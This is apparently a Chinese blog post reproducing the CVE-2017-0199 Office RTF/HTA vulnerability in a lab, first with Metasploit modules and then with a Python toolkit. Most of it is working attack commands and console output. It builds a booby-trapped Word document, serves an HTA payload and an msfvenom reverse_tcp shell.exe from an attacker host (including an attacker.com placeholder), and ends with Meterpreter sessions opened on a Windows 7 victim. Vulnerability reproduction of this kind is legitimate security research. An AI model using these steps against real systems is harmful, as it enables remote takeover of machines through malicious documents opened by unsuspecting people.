CVE-2017-0199 复现

0x01 通过 Metasploit展开目录

参考链接

准备展开目录

更新 MSF 到最新。

下载对应 Exploit

cd /usr/share/metasploit-framework/modules/exploits/windows/fileformat
wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/modules/exploits/windows/fileformat/office_word_hta.rb

下载 rtf 文件

cd /usr/share/metasploit-framework/data/exploits
wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/data/exploits/cve-2017-0199.rtf

开启 HTA 服务展开目录

msf > use exploit/windows/misc/hta_server 
msf exploit(hta_server) > show options 

Module options (exploit/windows/misc/hta_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Powershell x86


msf exploit(hta_server) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 10.14.81.6:4444 
[*] Using URL: http://0.0.0.0:8080/5Fzi0vL.hta
[*] Local IP: http://10.14.81.6:8080/5Fzi0vL.hta
msf exploit(hta_server) > [*] Server started.
msf exploit(hta_server) >

生成 payload展开目录

msf exploit(hta_server) > use exploit/windows/fileformat/office_word_hta 
msf exploit(office_word_hta) > show options 

Module options (exploit/windows/fileformat/office_word_hta):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   FILENAME                                no        The file name.
   TARGETURI  http://example.com/test.rtf  yes       The path to a online hta file.


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office Word


msf exploit(office_word_hta) > set TARGETURI http://10.14.81.6:8080/5Fzi0vL.hta
TARGETURI => http://10.14.81.6:8080/5Fzi0vL.hta
msf exploit(office_word_hta) > set FILENAME msf.doc
FILENAME => msf.doc
msf exploit(office_word_hta) > run

[+] msf.doc stored at /root/.msf4/local/msf.doc
msf exploit(office_word_hta) >

将生成的 msf.doc 文件复制到 Windows 上,打开即可获取一个会话。

《CVE-2017-0199 复现》

msf exploit(office_word_hta) > 
[*] 10.14.89.247     hta_server - Delivering Payload
[*] 10.14.89.247     hta_server - Delivering Payload
[*] Sending stage (957487 bytes) to 10.14.89.247
[*] Meterpreter session 1 opened (10.14.81.6:4444 -> 10.14.89.247:10576) at 2017-04-19 21:58:03 +0800

msf exploit(office_word_hta) > sessions -i

Active sessions
===============

  Id  Type                     Information       Connection
  --  ----                     -----------       ----------
  1   meterpreter x86/windows  hp-PC\hp @ HP-PC  10.14.81.6:4444 -> 10.14.89.247:10576 (10.14.89.247)

msf exploit(office_word_hta) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : HP-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x86/windows

0x02 通过 Toolkit展开目录

准备展开目录

下载 Toolkit

生成 payload展开目录

python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>

生成 meterpreter payload展开目录

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"

开启 HTA 服务展开目录

python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>

受害者打开文档后收到 shell。

《CVE-2017-0199 复现》

[*] Started reverse TCP handler on 10.14.81.6:4444 
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to 10.14.89.247
[*] Meterpreter session 1 opened (10.14.81.6:4444 -> 10.14.89.247:12775) at 2017-04-19 23:09:03 +0800

meterpreter > sysinfo
Computer        : HP-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x86/windows
meterpreter > screenshot 
[-] stdapi_ui_desktop_screenshot: Operation failed: Access is denied.
点赞